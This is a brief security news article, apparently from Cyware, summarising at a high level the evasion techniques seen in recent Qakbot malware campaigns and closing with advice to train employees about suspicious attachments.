Go to listing page

New Qakbot Attacks are Much Stealthier and Effective than Ever

New Qakbot Attacks are Much Stealthier and Effective than Ever
Qakbot info-stealing malware, which has been active since 2008, continues to evolve, adapt and implement new techniques to avoid detection by security systems.

What are its new techniques?

Researchers have spotted a significant rise in Qakbot malware infection, with improved tactics, over the past six months. The three notable techniques are as follows.
  • Evading detection by using ZIP file extensions and appealing file names with common formats.
  • Using Excel 4.0 to lure victims into downloading malicious attachments that lead to Qakbot installation.
  • Using unknown file extension names to drop the payload and changing the steps by using new stages between initial compromise, delivery, and final execution.

Other subtle techniques observed by researchers included obfuscating code and the use of multiple URLs to deliver the payload.

Using catchy names

The attackers are using several different file names to mask attachments created to deliver Qakbot. The used file names include a description, generated numbers, and dates. 
  • These attached files come with common keywords related to finance and business operations that attempt to fool victims into believing that those are regular business documents.
  • Additionally, the attackers used PowerShell to download the malicious code and a switch from rundlll32[.]exe to regsvr32[.]exe for loading the malicious payload to avoid detection.

Conclusion

The recent Qakbot campaigns have demonstrated a strong urge to enhance their attacks and stealth capabilities. To stay protected from such threats, organizations are recommended to train their employees on how to manage attachments and avoid opening suspicious attachments.
Cyware Publisher

Publisher

Cyware